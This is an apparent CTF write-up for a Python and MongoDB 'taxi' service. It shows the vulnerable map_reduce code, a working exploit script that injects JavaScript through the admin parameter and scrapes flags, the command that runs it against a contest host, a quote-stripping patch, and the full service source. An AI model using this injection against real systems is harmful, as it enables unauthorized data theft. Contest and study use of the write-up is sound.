# cat blog >> /dev/brain 2> /proc/mind
cat blog >> /dev/brain 2> /proc/mind
# cat taxi.py ... def get_map_func(admin_name): map_f = "function() { if (this.admin == '" + admin_name + "') emit(this.admin, this.amount); }" return Code(map_f) def get_reduce_func(): reduce_f = "function(key, values) {return Array.sum(values) / 1.1;}" return Code(reduce_f) def mr_test(col, admin_name): res = col.map_reduce(get_map_func(admin_name), get_reduce_func(), "res") return list(res.find()) ...
cat taxi.py
# cat exploit.py #!/usr/bin/python import httplib import urllib import re import sys def taxi_exploit(ip, username): port = 8081 query= '/add_admin/?admin=' + username conn = httplib.HTTPConnection(ip, port) conn.request('POST', query) resp = conn.getresponse() hmac = resp.getheader('set-cookie') js_injection = urllib.quote_plus("' || true) emit(this.route, 1); if('") query= '/amount/?user=' + username + '&admin=' + js_injection headers = {"Cookie": hmac} conn.request('GET', query, '', headers) resp = conn.getresponse() data = resp.read() conn.close() flags = [] for flag in re.findall('[A-Za-z0-9=]{32}', data): flags.append(flag) for i in flags: print i ip = sys.argv[1] username = sys.argv[2] taxi_exploit(ip, username) # ./exploit.py 10.23.x.2 `head -c 4 /dev/urandom | xxd -p`
cat exploit.py
./exploit.py 10.23.x.2 `head -c 4 /dev/urandom | xxd -p`
# cat taxi.py ... def mr_test(col, admin_name): #res = col.map_reduce(get_map_func(admin_name), get_reduce_func(), "res") res = col.map_reduce(get_map_func(re.sub(r"'", "", admin_name)), get_reduce_func(), "res") return list(res.find()) ...
re.sub(r"'", "", admin_name)
# cat taxi.py #!/usr/bin/python import urlparse import os import random import string import hmac import hashlib import os.path import json import re from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer from pymongo import collection from pymongo import Connection from datetime import datetime from bson.code import Code DBNAME = 'taxi' COLNAME = 'orders' USERS = 'users' KEY_FILE = 'key' def connect_db(dbname): c = Connection() return c[dbname] def generate_id(): abc = string.ascii_lowercase + string.digits res = ''.join(random.choice(abc) for i in range(4)) res += "-" res += ''.join(random.choice(abc) for i in range(4)) res += "-" res += ''.join(random.choice(abc) for i in range(4)) return res def add(amount, admin, user, route, col): generated_id = generate_id() return add_by_id(generated_id, amount, admin, user, route, col) def add_by_id(id, amount, admin, user, route, col): rid = col.insert( {"_id": id, "date": datetime.now(), "amount": amount, "admin": admin, "user": user, "route": route}) print rid return rid def get_by_id(id, col): found = col.find_one({"_id": id}) return dict(found) def get_map_func(admin_name): map_f = "function() { if (this.admin == '" + admin_name + "') emit(this.admin, this.amount); }" return Code(map_f) def get_reduce_func(): reduce_f = "function(key, values) {return Array.sum(values) / 1.1;}" return Code(reduce_f) def mr_test(col, admin_name): #res = col.map_reduce(get_map_func(admin_name), get_reduce_func(), "res") res = col.map_reduce(get_map_func(re.sub(r"'", "", admin_name)), get_reduce_func(), "res") return list(res.find()) def view_all(col, admin_name): res = col.find({"admin": admin_name}).sort("date") return list(res) def r_replace(s, old, new, occurrence): li = s.rsplit(old, occurrence) return new.join(li) def dict_to_str(dic): d = {} for i in dic: d[i] = str(dic[i]) return json.dumps(d) def try_create_user(query, db): try: p = urlparse.parse_qs(query) admin = p['admin'][0] user = p['user'][0] col = collection.Collection(db, USERS) admin_exists = col.find_one({"admin": admin}) if admin_exists is None: return "Admin does not exist", "" user_exists = col.find_one({"user": user}) if user_exists is not None: return "User already exists", "" id = col.insert({"admin": admin, "user": user}) if id: return "Success", user else: return "Can't create new user", "" except KeyError: return "You have to set [admin], [user] and [pswd] parameters in order to register new user", "" def try_create_admin(query, db): try: p = urlparse.parse_qs(query) admin = p['admin'][0] col = collection.Collection(db, USERS) admin_exists = col.find_one({"admin": admin}) if admin_exists is not None: return "Admin already exists", "" id = col.insert({"admin": admin, "user": admin}) if id: return "Success", admin else: return "Can't create new admin", "" except KeyError: return "You have to set [admin] parameter in order to register new admin", "" def get_hmac(message): try: key = file(KEY_FILE).read() return hmac.new(key, message, digestmod=hashlib.sha1).hexdigest() except: return None class MonHTTPRequestHandler(BaseHTTPRequestHandler): def do_GET(self): try: parsed = urlparse.urlparse(self.path) action = os.path.split(parsed.path)[0] action = action.replace('/', '') print action p = urlparse.parse_qs(parsed.query) user = p['user'][0] db = connect_db(DBNAME) col = collection.Collection(db, COLNAME) if 'cookie' not in self.headers: print "no cookie sent" self.send_error(401) return print self.headers['cookie'] c = self.headers['cookie'] r = re.search("hm=([^;]+)", c) if not r: print "no hmac sent" self.send_error(401) return h_mac = r.group(1) if h_mac != get_hmac(user): self.send_error(401) return if action == 'route': if 'id' in p: r_id = p['id'][0] res = get_by_id(r_id, col) result_doc = dict_to_str(res) self.send_response(200) self.send_header('Content-type', 'text-html') self.end_headers() self.wfile.write(result_doc) return else: self.send_response(400) return elif action == 'routes': admin = p['admin'][0] result_doc = view_all(col, admin) elif action == 'amount': admin = p['admin'][0] result_doc = mr_test(col, admin) print result_doc else: self.send_response(405) return self.send_response(200) self.send_header('Content-type', 'text-html') self.end_headers() for doc in result_doc: self.wfile.write(json.dumps(doc)) self.wfile.write("\n") return except Exception as e: print str(e) self.send_error(404) def do_POST(self): try: parsed = urlparse.urlparse(self.path) action = os.path.split(parsed.path)[0] action = action.replace('/', '') print action db = connect_db(DBNAME) col = collection.Collection(db, COLNAME) if action == 'add_user': res, user = try_create_user(parsed.query, db) if res == "Success": self.send_response(200) self.send_header('Set-Cookie', 'hm=' + get_hmac(user)) self.end_headers() else: self.send_error(400) self.wfile.write(res) return elif action == 'add_admin': res, admin = try_create_admin(parsed.query, db) if res == "Success": self.send_response(200) self.send_header('Set-Cookie', 'hm=' + get_hmac(admin)) self.end_headers() else: self.send_error(400) self.wfile.write(res) return elif action == 'add_route': if 'cookie' not in self.headers: print "no cookie sent" self.send_error(401) return print self.headers['cookie'] c = self.headers['cookie'] r = re.search("hm=([^;]+)", c) if not r: print "no hmac sent" self.send_error(401) return h_mac = r.group(1) p = urlparse.parse_qs(parsed.query) user = p['user'][0] if h_mac != get_hmac(user): self.send_error(401) return try: amount = float(p['amount'][0]) except ValueError: self.send_response(400) return admin = p['admin'][0] route = p['route'][0] o_id = p.get('id', [""])[0] print "params: " + o_id + "; " + str(amount) if o_id == "": result = add(amount, admin, user, route, col) else: result = add_by_id(o_id, amount, admin, user, route, col) self.send_header('Content-type', 'text-html') self.end_headers() self.wfile.write(result) if result is not None: self.send_response(200) else: self.send_error(501) return else: self.send_error(405) return except Exception as e: print str(e) self.send_error(500) def gen_key_if_not_exists(): if os.path.isfile(KEY_FILE): return length = 256 chars = string.ascii_letters + string.digits + '!@#$%^&*()' random.seed = (os.urandom(1024)) key = ''.join(random.choice(chars) for i in range(length)) try: open(KEY_FILE, 'w').write(key) except: print "Can't create key file" return def run(): print 'taxi service is starting...' server_address = ('', 8081) httpd = HTTPServer(server_address, MonHTTPRequestHandler) print 'Welcome to our taxi service!' print 'You can order trips, view your users\' routes and monitor your riding costs' print 'Please notice that we charge you extra 10% VAT according to our Ural state laws' gen_key_if_not_exists() httpd.serve_forever() if __name__ == '__main__': run()
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